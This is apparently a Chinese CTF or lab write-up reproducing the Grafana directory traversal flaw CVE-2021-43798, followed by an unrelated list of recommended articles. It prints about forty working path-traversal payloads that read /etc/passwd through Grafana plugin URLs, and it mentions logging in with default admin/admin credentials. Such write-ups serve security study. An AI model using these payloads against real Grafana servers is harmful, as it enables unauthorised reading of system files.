sec0nd_
sec0nd_

grafana 目录遍历 (CVE-2021-43798)

前言

详细的漏洞分析见https://blog.csdn.net/weixin_45794666/article/details/123228409

漏洞描述

Grafana 是一个用于监控和可观察性的开源平台。Grafana 版本 8.0.0-beta1 到 8.3.0(补丁版本除外)容易受到目录遍历,允许访问本地文件。易受攻击的 URL 路径是:/public/plugins//,其中是任何已安装插件的插件 ID。Grafana Cloud 在任何时候都不会受到攻击。建议用户升级到补丁版本 8.0.7、8.1.8、8.2.7 或 8.3.1。GitHub 安全公告包含有关易受攻击的 URL 路径、缓解措施和披露时间表的更多信息。

复现过程

端口是3000
grafana 目录遍历 (CVE-2021-43798)_第1张图片

打开后是个登陆界面
grafana 目录遍历 (CVE-2021-43798)_第2张图片
试了下默认密码admin/admin,没想到进来了…
grafana 目录遍历 (CVE-2021-43798)_第3张图片
好了不玩了,以上不是本次漏洞的复现过程

首先是抓一个包
grafana 目录遍历 (CVE-2021-43798)_第4张图片
构造payload路径,因为漏洞是由插件造成的,不同插件的payload略有差别,下面是几乎所有插件的payload

/public/plugins/alertlist/../../../../../../../../../../../etc/passwd
/public/plugins/annolist/../../../../../../../../../../../etc/passwd
/public/plugins/grafana-azure-monitor-datasource/../../../../../../../../../../../etc/passwd
/public/plugins/barchart/../../../../../../../../../../../etc/passwd
/public/plugins/bargauge/../../../../../../../../../../../etc/passwd
/public/plugins/cloudwatch/../../../../../../../../../../../etc/passwd
/public/plugins/dashlist/../../../../../../../../../../../etc/passwd
/public/plugins/elasticsearch/../../../../../../../../../../../etc/passwd
/public/plugins/gauge/../../../../../../../../../../../etc/passwd
/public/plugins/geomap/../../../../../../../../../../../etc/passwd
/public/plugins/gettingstarted/../../../../../../../../../../../etc/passwd
/public/plugins/stackdriver/../../../../../../../../../../../etc/passwd
/public/plugins/graph/../../../../../../../../../../../etc/passwd
/public/plugins/graphite/../../../../../../../../../../../etc/passwd
/public/plugins/heatmap/../../../../../../../../../../../etc/passwd
/public/plugins/histogram/../../../../../../../../../../../etc/passwd
/public/plugins/influxdb/../../../../../../../../../../../etc/passwd
/public/plugins/jaeger/../../../../../../../../../../../etc/passwd
/public/plugins/logs/../../../../../../../../../../../etc/passwd
/public/plugins/loki/../../../../../../../../../../../etc/passwd
/public/plugins/mssql/../../../../../../../../../../../etc/passwd
/public/plugins/mysql/../../../../../../../../../../../etc/passwd
/public/plugins/news/../../../../../../../../../../../etc/passwd
/public/plugins/nodeGraph/../../../../../../../../../../../etc/passwd
/public/plugins/opentsdb/../../../../../../../../../../../etc/passwd
/public/plugins/piechart/../../../../../../../../../../../etc/passwd
/public/plugins/pluginlist/../../../../../../../../../../../etc/passwd
/public/plugins/postgres/../../../../../../../../../../../etc/passwd
/public/plugins/prometheus/../../../../../../../../../../../etc/passwd
/public/plugins/stat/../../../../../../../../../../../etc/passwd
/public/plugins/state-timeline/../../../../../../../../../../../etc/passwd
/public/plugins/status-history/../../../../../../../../../../../etc/passwd
/public/plugins/table/../../../../../../../../../../../etc/passwd
/public/plugins/table-old/../../../../../../../../../../../etc/passwd
/public/plugins/tempo/../../../../../../../../../../../etc/passwd
/public/plugins/testdata/../../../../../../../../../../../etc/passwd
/public/plugins/text/../../../../../../../../../../../etc/passwd
/public/plugins/timeseries/../../../../../../../../../../../etc/passwd
/public/plugins/welcome/../../../../../../../../../../../etc/passwd
/public/plugins/zipkin/../../../../../../../../../../../etc/passwd

拿第一个举例,把请求路径改为payload路径
grafana 目录遍历 (CVE-2021-43798)_第5张图片
可以读到passwd文件

flag在哪里呢?

在历史命令里面
grafana 目录遍历 (CVE-2021-43798)_第6张图片

修复建议

升级版本或者打补丁

你可能感兴趣的:(web笔记,安全笔记,安全)

  • Solana 倒霉男孩 Solana区块链web3
    文章目录概要Solana的核心技术特点1.历史证明(ProofofHistory,PoH)2.混合共识机制3.低费用模型4.开发者生态5.存储模式Solanavs其他主流链的关键区别1.性能对比2.开发模型对比3.去中心化与安全性4.生态应用方向三、Solana的优缺点总结优势劣势概要Solana是近年来快速崛起的高性能区块链平台,其核心设计目标是通过技术创新突破传统区块链的性能瓶颈(如以太坊的低
  • Java程序开发之Spring Security实战:JWT实现登录鉴权 微风不留尘 javajavaspringjava入门springsecurity
    一、JWT与安全认证核心原理1.JWT结构解析Header(头部){"alg":"HS256","typ":"JWT"}Payload(负载){"sub":"user123","exp":1680403200,"roles":["USER","ADMIN"]}Signature(签名)HMACSHA256(base64UrlEncode(header)+"."+base64UrlEncode(pa
  • 贵重资产跟踪和监测领域的市场机会点 番茄老夫子 物联网
    一、技术创新驱动带来的机会点随着全球卫星导航系统(GNSS)不断完善,如北斗系统的高精度定位服务愈发成熟,定位精度可达到亚米级甚至厘米级。在贵重资产运输,像高价值艺术品、精密医疗器械等领域,这种高精度定位能够实时精准掌握资产位置,防止运输途中的丢失与被盗风险,为资产所有者提供更高的安全保障,由此催生对高精度定位设备与服务的需求。室内定位技术,如基于蓝牙、Wi-Fi的定位方案不断优化,在大型仓库、物
  • Python接入支付宝支付 I am not people python开发语言
    Python接入支付宝支付简介支付宝是一家早已在中国非常流行的在线支付服务提供商,近年来发展速度越来越快。由于支付宝提供的安全性和便利性,越来越多的用户开始在网站、移动应用程序等服务上使用支付宝支付,因此接入支付宝支付已成为许多业务的必要选择。在此文中,我们将介绍如何使用Python接入支付宝支付的基础步骤,包括:设置支付宝开发者帐号集成支付宝SDK创建支付请求向支付宝发起支付1.设置支付宝开发者
  • 【C 语言极简自学笔记】Day1 初识「C语言」 LQYYDSY 学习笔记笔记c语言
    一句话认识C语言「C是唯一能让你同时触摸硬件和软件的语言」C语言是一门通用计算机编程语言,广泛应用于底层开发,主要是提供一种能以简易的方式编译、处理低级存储器、产生少量的机器码以及不需要任何运行环境支持便能运行的编程语言。第一个C语言实例#includeintmain(){printf("HelloWorld!!!");return0;}(1)main函数是C语言程序的入口,一个C语言程序有且只有
  • YOLO优化之扫描融合模块(SimVSS Block) 清风AI 人工智能计算机视觉YOLO目标检测深度学习目标跟踪
    研究背景在自动驾驶技术快速发展的背景下,目标检测作为其核心组成部分面临着严峻挑战。驾驶场景中目标尺度和大小的巨大差异,以及视觉特征不显著且易受噪声干扰的问题,对辅助驾驶系统的安全性构成了潜在威胁。传统的卷积神经网络(CNN)虽然在目标检测领域取得了显著进展,但仍存在局限性,如局部关注性导致难以有效检测不同尺度的目标。为克服这些问题,研究人员开始探索将状态空间模型(SSM)引入目标检测领域,以期提高
  • linux变量TMOUT 小黑要上天 linux小常识linux运维服务器TMOUT
    在linux中,TMOUT变量用于设置shell的超时时间。如果用户在指定的时间内没有任何操作,shell会自动注销或终止。工作原理:1.当设置了TMOUT,如何用户在指定的时间内没有任何输入,shell会自动退出,终端会话结束。2.TMOUT适用于交互式shell,也就是说,它在用户与shell进行交互时有效。适用场景:1.主要用户增强系统安全性,防止长期无人操作的会话占用资源。2.对于远程登录
  • Android手机中各类安全相关知识总结 数据知道 2025年爬虫和逆向教程android智能手机安全
    更多内容请见:爬虫和逆向教程-专栏介绍和目录文章目录1.Android安全威胁2.Android安全防护措施3.Android安全建议和最佳实践4.Android安全工具推荐5.Android安全常见问题5.1如何检测设备是否感染恶意软件?5.2如何防止应用滥用权限?5.3如何保护设备免受网络攻击?5.4设备丢失后如何保护数据?6.学习资源7.总结Android手机作为全球使用最广泛的移动操作系统
  • Javascript基础语法详解 Warren98 javascript开发语言ecmascript
    面向对象的语言.脚本语言,不需要编译,浏览器解释即可运行.用于控制网页的行为.浏览器的source可以打断点调试,console输入代码可以执行usestrict指令:在“严格模式”下运行js代码,防止意外创建全局变量等,提高代码安全性和执行效率.使用:全局严格模式:在脚本的开头添加"usestrict".函数级严格模式:在函数的开头添加"usestrict":functionmyFunction
  • 代码质量的基石:Python 单元测试实战 (unittest vs pytest) 清水白石008 pythonPython题库python单元测试pytest
    代码质量的基石:Python单元测试实战(unittestvspytest)引言在软件开发的浩瀚征程中,代码质量是决定项目成败的关键因素。如同建筑物的地基,稳固的代码质量能够支撑起复杂而庞大的系统,反之则可能导致系统崩溃、维护困难,甚至安全漏洞。单元测试,作为保障代码质量的第一道防线,扮演着至关重要的角色。Python,作为一门以简洁优雅著称的编程语言,拥有丰富的测试框架,其中unittest和p
  • 如何实现自动备份 MySQL 数据库:脚本编写与部署指南 *才华有限公司* 数据库mysql
    引言在远程部署的时候,数据备份是确保业务连续性和数据安全的关键步骤。对于使用MySQL数据库的系统,定期备份数据库是必不可少的。本文将详细介绍如何编写一个Bash脚本,实现自动备份MySQL数据库,并将其部署到远程服务器上。1.需求分析在开始编写脚本之前,我们需要明确以下需求:备份频率:每周二备份一次。备份文件存储:备份文件需要按日期存储,且不删除之前的备份数据。自动化运行:脚本需要通过cron任
  • 《Operating System Concepts》阅读笔记:p286-p308 操作系统
    《OperatingSystemConcepts》学习第28天,p286-p308总结,总计23页。一、技术总结1.reentrantlock(可重入锁)(1)为什么称为reentrantlock?AthreadacquiresaReentrantLocklockbyinvokingitslock()method.Ifthelockisavailable—orifthethreadinvoking
  • 【网络安全】使用mbedtls 实现 RSA 签名、验签、加密、解密 亿码归一码 网络安全web安全安全
    简介mbedtls(前身是PolarSSL)是一个开源、轻量级的SSL/TLS库,专为嵌入式系统和资源受限环境设计。RSA是一种广泛应用的非对称加密算法,是公开密钥密码体制(PublicKeyCryptosystem)的一个典型代表,它的核心特点是采用一对密钥,分别是公开密钥(PublicKey)和私有密钥(PrivateKey)。相关头文件#include#include#include#inc
  • Android 百度语音合成工具类封装:内存泄漏防护与简化调用 tangweiguo03051987 androidandroid
    适配高版本Android系统使用ApplicationContext避免内存泄漏默认回调支持,调用更简洁线程安全与资源释放优化完整代码:BaiduTTSManager.java:importandroid.content.Context;importandroid.os.Handler;importandroid.os.Looper;importandroid.util.Log;importand
  • MATAB学习笔记2 好大一口果汁 MATLAB学习笔记算法
    1.多项式拟合>>p=polyfit(DateNum,Pclose,1);%多项式拟合>>value=p(1)%将斜率赋值给value,作为股票的价值value=0.1212代码分析:%后面的内容是注释,ployfit()有三个参数,第三个参数表示多项式的阶数,也就是最高次数。比如:第三个参数为1,说明为1次项,即一次函数,第三个参数为你要拟合的阶数,一阶直线拟合,二阶抛物线拟合,并非阶次越高越好
  • 使用Redis如何实现分布式锁?(超卖) MiniFlyZt redis分布式数据库
    分布式锁概念在多线程环境下,为了保证数据的线程安全,锁保证同一时刻,只有一个可以访问和更新共享数据。在单机系统我们可以使用synchronized锁、Lock锁保证线程安全。synchronized锁是Java提供的一种内置锁,在单个JVM进程中提供线程之间的锁定机制,控制多线程并发。只适用于单机环境下的并发控制。想要在多个节点中提供锁定,在分布式系统并发控制共享资源,确保同一时刻只有一个访问可以
  • 基于DeepSeek R1构建下一代Manus通用型AI智能体的技术实践 zhangjiaofa DeepSeekR1&AI人工智能大模型DeepSeekManus智能体AI
    目录一、技术背景与目标定位1.1大模型推理能力演进趋势1.2DeepSeekR1核心特性解析-混合专家架构(MoE)优化-组相对策略优化(GRPO)原理-多阶段强化学习训练范式1.3Manus智能体框架设计理念-多智能体协作机制-安全执行沙箱设计二、系统架构设计2.1整体架构拓扑图-分层模块交互机制-数据流与控制流设计2.2核心组件实现-规划模块(GRPO算法集成)-记忆系统分级存储架构-工具调用
  • AI笔记——语音识别 Yuki-^_^ 人工智能AI人工智能笔记语音识别
    摘要:语音识别(AutomaticSpeechRecognition,ASR)是人工智能领域的一项重要技术,它将人类的语音信号转换成文字。随着科技的发展,语音识别已经成为现代生活和工作中不可或缺的一部分。本文旨在介绍语音识别的基本原理、关键技术、应用场景以及未来发展趋势。一、历史与发展语音识别技术的历史可以追溯到20世纪50年代,那时的技术基于规则和模板。随着计算能力的提升和深度学习方法的出现,语
  • 网络运维学习笔记(DeepSeek优化版) 018 HCIA-Datacom综合实验03 技术小齐 网络运维学习
    文章目录综合实验3实验需求一:A公司网络规划二:B公司网络规划配置一、ip、vlan、vlanif,stp、eth-trunkSW1SW2R1二、ospfSW1R1三、NATR1ISP四、拒绝ping允许httpSW1五、右半部分vlan、dhcp、ospf、NATSW4R2综合实验3实验需求一:A公司网络规划SW1/2/3组成了A公司的交换网络,其中SW1是核心层,SW2/3是接入层。三台交换机
  • [学习笔记] Windows编程——GDI——(六)设备上下文 根本没在怕哦 Windows编程学习笔记windows
    前言:学习笔记,随时更新。如有谬误,欢迎指正。说明:红色字体为较为重要部分。绿色字体为个人理解部分。原文链接:https://learn.microsoft.com/en-us/windows/win32/gdi/device-contexts6设备上下文设备上下文是一种结构,用于定义一组图形对象及其关联属性,以及影响输出的图形模式。图形对象包括用于线条绘制的笔、用于绘制和填充的画刷、用于复制或滚
  • MySQL的行级锁锁的到底是什么? java1234_小锋 mysqlmysql数据库
    大家好,我是锋哥。今天分享关于【Mysql自增主键会遇到什么问题?】面试题。希望对大家有帮助;MySQL的行级锁锁的到底是什么?1000道互联网大厂Java工程师精选面试题-Java资源分享网MySQL的行级锁(Row-levelLocking)是一种粒度较细的锁定机制,它用于对数据库中的单行数据进行锁定,确保在并发环境中多个事务能够安全地访问数据,同时减少锁的争用,提升系统性能。行级锁是MySQ
  • [学习笔记] Windows编程——GDI——(三)裁剪 根本没在怕哦 Windows编程学习笔记windows
    前言:学习笔记,随时更新。如有谬误,欢迎指正。说明:红色字体为较为重要部分。绿色字体为个人理解部分。原文链接:https://learn.microsoft.com/en-us/windows/win32/gdi/clipping3裁剪剪裁是将输出限制为应用程序窗口的工作区中的某个区域或路径的过程。3.1关于裁剪应用程序通过多种方式使用剪裁。Word和Excel应用程序剪裁键盘输入,使其不显示在页
  • 计算机四级 - 数据库原理 - 第7章「数据库系统实现技术」 akbar& 计算机四级数据库笔记
    7.1数据库管理系统概述7.1.1数据库管理系统的基本功能数据定义功能:数据库模式(包括外模式、模式、内模式)的定义、数据库完整性的定义、安全保密的定义,索引和视图的定义数据操纵功能数据存储和管理功能事务管理功能数据定义功能7.1.2数据库管理系统的主要成分和工作流程:存储管理器:高效的利用辅助存储器来存放数据,并使得数据能够快速存取重要模块:索引、文件、记录管理器查询处理器:高效的执行用SQL等
  • 如何处理PHP中的编码问题 奥顺互联V phpphpandroid开发语言
    如何处理PHP中的编码问题在PHP开发过程中,编码问题是一个常见且棘手的问题。无论是处理用户输入、数据库交互,还是与外部API通信,编码问题都可能导致数据乱码、解析错误甚至安全漏洞。本文将深入探讨PHP中的编码问题,并提供一些实用的解决方案。1.理解字符编码字符编码是计算机中表示字符的方式。常见的字符编码包括ASCII、UTF-8、GBK等。UTF-8是一种变长的Unicode编码,能够表示世界上
  • 基于 Docker 搭建 FRP 内网穿透开源项目 xdpcxq1029 技术分享docker开源容器
    有些配置项不知道该不该用,不知道该在哪用,不知道怎么用,所以我自己写个文章简单记录一下做个笔记本文介绍的是基于Docker运行frps和frpc,并通过TCP协议简单穿透SSH和HTTP,在观看本文之前请确保你的机器已经安装Docker服务端搭建frps#连接拥有公网IP的服务器,在合适的位置创建frps目录作为工作空间#创建frps目录作为工作空间$mkdirfrps#创建服务端配置文件$tou
  • xodooIP地址定位 odoo实施 XODOOPROXodooodoopython
    //src/packages/python/geoip2.rs实现特点:跨平台支持:通过Rust原生实现,兼容Windows、Linux、macOS等主流操作系统类型安全:使用Rust的Option类型处理可能缺失的字段严格校验IP地址格式自动处理编码转换性能优化:数据库文件只加载一次内存映射方式读取数据零拷贝解析技术错误处理:明确的错误类型(IOError/ValueError)友好的错误提示信
  • TK矩阵:提高多账号管理效率的利器 m0_74891046 矩阵
    随着TikTok的火爆,越来越多的人开始利用这个平台进行内容创作和社交互动。无论是个人创作者、品牌方,还是营销公司,TikTok都提供了巨大的机会,但同时也带来了运营上的挑战,尤其是在管理多个账户时。每个账号的维护、内容发布、互动和数据分析,都需要耗费大量的时间和精力。TK矩阵是为了应对这些挑战而推出的一款工具,它为需要操作多个TikTok账号的用户提供了一种更高效、更安全的管理方式。基于云技术和
  • 将本地文件上传到远程Linux服务器SCP的用法
    服务器文件传输工具指南:SCP与rsync一、SCP的介绍SCP命令(SecureCopy)是一个用于在服务器和本地计算机之间传输文件的命令行工具。1.核心特性基于SSH协议的安全传输支持文件/目录传输保留基础文件属性2.基础语法scp[选项]源路径目标路径3.常用操作3.1通过scp实现文件上传3.1.1单文件上传#上传文件scp./local_diruser@host:/remote_dest
  • Omnissa Horizon 8 2412 (8.14) - 虚拟桌面基础架构 (VDI) 和应用软件 虚拟化
    OmnissaHorizon82412(8.14)-虚拟桌面基础架构(VDI)和应用软件之前称为VMwareHorizon,通过高效、安全的虚拟桌面交付增强您的工作空间请访问原文链接:https://sysin.org/blog/omnissa-horizon-8/查看最新版。原创作品,转载请保留出处。作者主页:sysin.orgHorizon8formerlyVMwareHorizon通过从本地
  • Web安全攻防入门教程——hvv行动详解 白帽子黑客罗哥 web安全安全网络安全pythonjava
    Web安全攻防入门教程Web安全攻防是指在Web应用程序的开发、部署和运行过程中,保护Web应用免受攻击和恶意行为的技术与策略。这个领域不仅涉及防御措施的实现,还包括通过渗透测试、漏洞挖掘和模拟攻击来识别潜在的安全问题。本教程将带你入门Web安全攻防的基础概念、常见攻击类型、防御技术以及一些实战方法。一、Web安全基础Web应用安全的三大核心目标(CIA三原则)机密性(Confidentialit
  • 深入浅出Java Annotation(元注解和自定义注解) Josh_Persistence Java Annotation元注解自定义注解
    一、基本概述        Annontation是Java5开始引入的新特征。中文名称一般叫注解。它提供了一种安全的类似注释的机制,用来将任何的信息或元数据(metadata)与程序元素(类、方法、成员变量等)进行关联。     更通俗的意思是为程序的元素(类、方法、成员变量)加上更直观更明了的说明,这些说明信息是与程序的业务逻辑无关,并且是供指定的工具或
  • mysql优化特定类型的查询 annan211 java工作mysql
    本节所介绍的查询优化的技巧都是和特定版本相关的,所以对于未来mysql的版本未必适用。 1 优化count查询 对于count这个函数的网上的大部分资料都是错误的或者是理解的都是一知半解的。在做优化之前我们先来看看 真正的count()函数的作用到底是什么。 count()是一个特殊的函数,有两种非常不同的作用,他可以统计某个列值的数量,也可以统计行数。 在统
  • MAC下安装多版本JDK和切换几种方式 棋子chessman jdk
    环境: MAC AIR,OS X 10.10,64位   历史: 过去 Mac 上的 Java 都是由 Apple 自己提供,只支持到 Java 6,并且OS X 10.7 开始系统并不自带(而是可选安装)(原自带的是1.6)。 后来 Apple 加入 OpenJDK 继续支持 Java 6,而 Java 7 将由 Oracle 负责提供。   在终端中输入jav
  • javaScript (1) Array_06 JavaScriptjava浏览器
    JavaScript 1、运算符   运算符就是完成操作的一系列符号,它有七类:   赋值运算符(=,+=,-=,*=,/=,%=,<<=,>>=,|=,&=)、算术运算符(+,-,*,/,++,--,%)、比较运算符(>,<,<=,>=,==,===,!=,!==)、逻辑运算符(||,&&,!)、条件运算(?:)、位
  • 国内顶级代码分享网站 袁潇含 javajdkoracle.netPHP
           现在国内很多开源网站感觉都是为了利益而做的                  当然利益是肯定的,否则谁也不会免费的去做网站      &
  • Elasticsearch、MongoDB和Hadoop比较 随意而生 mongodbhadoop搜索引擎
      IT界在过去几年中出现了一个有趣的现象。很多新的技术出现并立即拥抱了“大数据”。稍微老一点的技术也会将大数据添进自己的特性,避免落大部队太远,我们看到了不同技术之间的边际的模糊化。假如你有诸如Elasticsearch或者Solr这样的搜索引擎,它们存储着JSON文档,MongoDB存着JSON文档,或者一堆JSON文档存放在一个Hadoop集群的HDFS中。你可以使用这三种配
  • mac os 系统科研软件总结 张亚雄 mac os
    1.1 Microsoft Office for Mac 2011      大客户版,自行搜索。      1.2 Latex (MacTex):      系统环境:https://tug.org/mactex/     &nb
  • Maven实战(四)生命周期 AdyZhang maven
    1. 三套生命周期     Maven拥有三套相互独立的生命周期,它们分别为clean,default和site。 每个生命周期包含一些阶段,这些阶段是有顺序的,并且后面的阶段依赖于前面的阶段,用户和Maven最直接的交互方式就是调用这些生命周期阶段。 以clean生命周期为例,它包含的阶段有pre-clean, clean 和 post
  • Linux下Jenkins迁移 aijuans Jenkins
    1. 将Jenkins程序目录copy过去      源程序在/export/data/tomcatRoot/ofctest-jenkins.jd.com下面            tar -cvzf jenkins.tar.gz ofctest-jenkins.jd.com &
  • request.getInputStream()只能获取一次的问题 ayaoxinchao requestInputstream
    问题:在使用HTTP协议实现应用间接口通信时,服务端读取客户端请求过来的数据,会用到request.getInputStream(),第一次读取的时候可以读取到数据,但是接下来的读取操作都读取不到数据   原因: 1. 一个InputStream对象在被读取完成后,将无法被再次读取,始终返回-1; 2. InputStream并没有实现reset方法(可以重
  • 数据库SQL优化大总结之 百万级数据库优化方案 BigBird2012 SQL优化
    网上关于SQL优化的教程很多,但是比较杂乱。近日有空整理了一下,写出来跟大家分享一下,其中有错误和不足的地方,还请大家纠正补充。 这篇文章我花费了大量的时间查找资料、修改、排版,希望大家阅读之后,感觉好的话推荐给更多的人,让更多的人看到、纠正以及补充。 1.对查询进行优化,要尽量避免全表扫描,首先应考虑在 where 及 order by 涉及的列上建立索引。 2.应尽量避免在 where
  • jsonObject的使用 bijian1013 javajson
            在项目中难免会用java处理json格式的数据,因此封装了一个JSONUtil工具类。 JSONUtil.java package com.bijian.json.study; import java.util.ArrayList; import java.util.Date; import java.util.HashMap;
  • [Zookeeper学习笔记之六]Zookeeper源代码分析之Zookeeper.WatchRegistration bit1129 zookeeper
    Zookeeper类是Zookeeper提供给用户访问Zookeeper service的主要API,它包含了如下几个内部类     首先分析它的内部类,从WatchRegistration开始,为指定的znode path注册一个Watcher,   /** * Register a watcher for a particular p
  • 【Scala十三】Scala核心七:部分应用函数 bit1129 scala
    何为部分应用函数? Partially applied function: A function that’s used in an expression and that misses some of its arguments.For instance, if function f has type Int => Int => Int, then f and f(1) are p
  • Tomcat Error listenerStart 终极大法 ronin47 tomcat
    Tomcat报的错太含糊了,什么错都没报出来,只提示了Error listenerStart。为了调试,我们要获得更详细的日志。可以在WEB-INF/classes目录下新建一个文件叫logging.properties,内容如下 Java代码  handlers = org.apache.juli.FileHandler, java.util.logging.ConsoleHa
  • 不用加减符号实现加减法 BrokenDreams 实现
            今天有群友发了一个问题,要求不用加减符号(包括负号)来实现加减法。         分析一下,先看最简单的情况,假设1+1,按二进制算的话结果是10,可以看到从右往左的第一位变为0,第二位由于进位变为1。    
  • 读《研磨设计模式》-代码笔记-状态模式-State bylijinnan java设计模式
    声明: 本文只为方便我个人查阅和理解,详细的分析以及源代码请移步 原作者的博客http://chjavach.iteye.com/ /* 当一个对象的内在状态改变时允许改变其行为,这个对象看起来像是改变了其类 状态模式主要解决的是当控制一个对象状态的条件表达式过于复杂时的情况 把状态的判断逻辑转移到表示不同状态的一系列类中,可以把复杂的判断逻辑简化 如果在
  • CUDA程序block和thread超出硬件允许值时的异常 cherishLC CUDA
    调用CUDA的核函数时指定block 和 thread大小,该大小可以是dim3类型的(三维数组),只用一维时可以是usigned int型的。 以下程序验证了当block或thread大小超出硬件允许值时会产生异常!!!GPU根本不会执行运算!!! 所以验证结果的正确性很重要!!! 在VS中创建CUDA项目会有一个模板,里面有更详细的状态验证。 以下程序在K5000GPU上跑的。
  • 诡异的超长时间GC问题定位 chenchao051 jvmcmsGChbaseswap
    HBase的GC策略采用PawNew+CMS, 这是大众化的配置,ParNew经常会出现停顿时间特别长的情况,有时候甚至长到令人发指的地步,例如请看如下日志: 2012-10-17T05:54:54.293+0800: 739594.224: [GC 739606.508: [ParNew: 996800K->110720K(996800K), 178.8826900 secs] 3700
  • maven环境快速搭建 daizj 安装mavne环境配置
    一 下载maven 安装maven之前,要先安装jdk及配置JAVA_HOME环境变量。这个安装和配置java环境不用多说。 maven下载地址:http://maven.apache.org/download.html,目前最新的是这个apache-maven-3.2.5-bin.zip,然后解压在任意位置,最好地址中不要带中文字符,这个做java 的都知道,地址中出现中文会出现很多
  • PHP网站安全,避免PHP网站受到攻击的方法 dcj3sjt126com PHP
    对于PHP网站安全主要存在这样几种攻击方式:1、命令注入(Command Injection)2、eval注入(Eval Injection)3、客户端脚本攻击(Script Insertion)4、跨网站脚本攻击(Cross Site Scripting, XSS)5、SQL注入攻击(SQL injection)6、跨网站请求伪造攻击(Cross Site Request Forgerie
  • yii中给CGridView设置默认的排序根据时间倒序的方法 dcj3sjt126com GridView
    public function searchWithRelated() {         $criteria = new CDbCriteria;         $criteria->together = true; //without th
  • Java集合对象和数组对象的转换 dyy_gusi java集合
        在开发中,我们经常需要将集合对象(List,Set)转换为数组对象,或者将数组对象转换为集合对象。Java提供了相互转换的工具,但是我们使用的时候需要注意,不能乱用滥用。 1、数组对象转换为集合对象     最暴力的方式是new一个集合对象,然后遍历数组,依次将数组中的元素放入到新的集合中,但是这样做显然过
  • nginx同一主机部署多个应用 geeksun nginx
    近日有一需求,需要在一台主机上用nginx部署2个php应用,分别是wordpress和wiki,探索了半天,终于部署好了,下面把过程记录下来。 1.   在nginx下创建vhosts目录,用以放置vhost文件。 mkdir vhosts   2.   修改nginx.conf的配置, 在http节点增加下面内容设置,用来包含vhosts里的配置文件 #
  • ubuntu添加admin权限的用户账号 hongtoushizi ubuntuuseradd
    ubuntu创建账号的方式通常用到两种:useradd 和adduser . 本人尝试了useradd方法,步骤如下: 1:useradd    使用useradd时,如果后面不加任何参数的话,如:sudo useradd sysadm 创建出来的用户将是默认的三无用户:无home directory ,无密码,无系统shell。 顾应该如下操作:  
  • 第五章 常用Lua开发库2-JSON库、编码转换、字符串处理 jinnianshilongnian nginxlua
      JSON库   在进行数据传输时JSON格式目前应用广泛,因此从Lua对象与JSON字符串之间相互转换是一个非常常见的功能;目前Lua也有几个JSON库,本人用过cjson、dkjson。其中cjson的语法严格(比如unicode \u0020\u7eaf),要求符合规范否则会解析失败(如\u002),而dkjson相对宽松,当然也可以通过修改cjson的源码来完成
  • Spring定时器配置的两种实现方式OpenSymphony Quartz和java Timer详解 yaerfeng1989 timerquartz定时器
    原创整理不易,转载请注明出处:Spring定时器配置的两种实现方式OpenSymphony Quartz和java Timer详解 代码下载地址:http://www.zuidaima.com/share/1772648445103104.htm 有两种流行Spring定时器配置:Java的Timer类和OpenSymphony的Quartz。 1.Java Timer定时 首先继承jav
  • Linux下df与du两个命令的差别? pda158 linux
     一、df显示文件系统的使用情况,与du比較,就是更全盘化。   最经常使用的就是 df -T,显示文件系统的使用情况并显示文件系统的类型。   举比例如以下:   [root@localhost ~]# df -T   Filesystem                   Type &n
  • [转]SQLite的工具类 ---- 通过反射把Cursor封装到VO对象 ctfzh VOandroidsqlite反射Cursor
    在写DAO层时,觉得从Cursor里一个一个的取出字段值再装到VO(值对象)里太麻烦了,就写了一个工具类,用到了反射,可以把查询记录的值装到对应的VO里,也可以生成该VO的List。   使用时需要注意: 考虑到Android的性能问题,VO没有使用Setter和Getter,而是直接用public的属性。 表中的字段名需要和VO的属性名一样,要是不一样就得在查询的SQL中
  • 该学习笔记用到的Employee表 vipbooks oraclesql工作
        这是我在学习Oracle是用到的Employee表,在该笔记中用到的就是这张表,大家可以用它来学习和练习。 drop table Employee; -- 员工信息表 create table Employee( -- 员工编号 EmpNo number(3) primary key, -- 姓
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他